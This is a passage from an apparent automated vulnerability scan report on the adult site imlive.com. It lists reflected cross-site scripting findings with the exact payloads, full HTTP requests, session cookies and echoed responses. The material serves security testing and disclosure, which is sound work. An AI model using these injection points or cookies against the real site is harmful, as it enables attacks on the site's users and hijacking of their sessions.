Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:34 GMT
Connection: close
Content-Length: 53900
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/role-play/?43819"><a>7fb20b0957a=1">
...[SNIP]...

4.538. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-galleries/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd9ca'-alert(1)-'52f7516f46a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/sex-show-galleries/?cd9ca'-alert(1)-'52f7516f46a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:19 GMT
Connection: close
Content-Length: 29898
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/content.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-galleries/?cd9ca'-alert(1)-'52f7516f46a=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.539. http://imlive.com/live-sex-chats/sex-show-galleries/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-galleries/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34839"><a>e84c423b110 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/sex-show-galleries/?34839"><a>e84c423b110=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:02 GMT
Connection: close
Content-Length: 29751
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-galleries/?34839"><a>e84c423b110=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.540. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-photos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71e01'-alert(1)-'ba036a24c83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/sex-show-photos/?71e01'-alert(1)-'ba036a24c83=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:28 GMT
Connection: close
Content-Length: 25736
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/snapshotgallery.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-photos/?71e01'-alert(1)-'ba036a24c83=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.541. http://imlive.com/live-sex-chats/sex-show-photos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-photos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a69"><a>8ff796eb34d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/sex-show-photos/?36a69"><a>8ff796eb34d=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:18 GMT
Connection: close
Content-Length: 25588
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-photos/?36a69"><a>8ff796eb34d=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.542. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-sessions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45e02'-alert(1)-'fb52648c8dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/sex-show-sessions/?45e02'-alert(1)-'fb52648c8dd=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:37 GMT
Connection: close
Content-Length: 26074
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/recordedlivesessions.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-sessions/?45e02'-alert(1)-'fb52648c8dd=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.543. http://imlive.com/live-sex-chats/sex-show-sessions/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-sessions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1dabb"><a>3c523209842 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/sex-show-sessions/?1dabb"><a>3c523209842=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:07 GMT
Connection: close
Content-Length: 25926
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-show-sessions/?1dabb"><a>3c523209842=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.544. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/sex-video-features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2028a"><a>c334382ea0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/sex-video-features/?2028a"><a>c334382ea0e=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:29 GMT
Connection: close
Content-Length: 32222
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/sex-video-features/?2028a"><a>c334382ea0e=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.545. http://imlive.com/live-sex-chats/sex-video-features/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-video-features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80442'-alert(1)-'ebd4ed614b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/sex-video-features/?80442'-alert(1)-'ebd4ed614b9=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
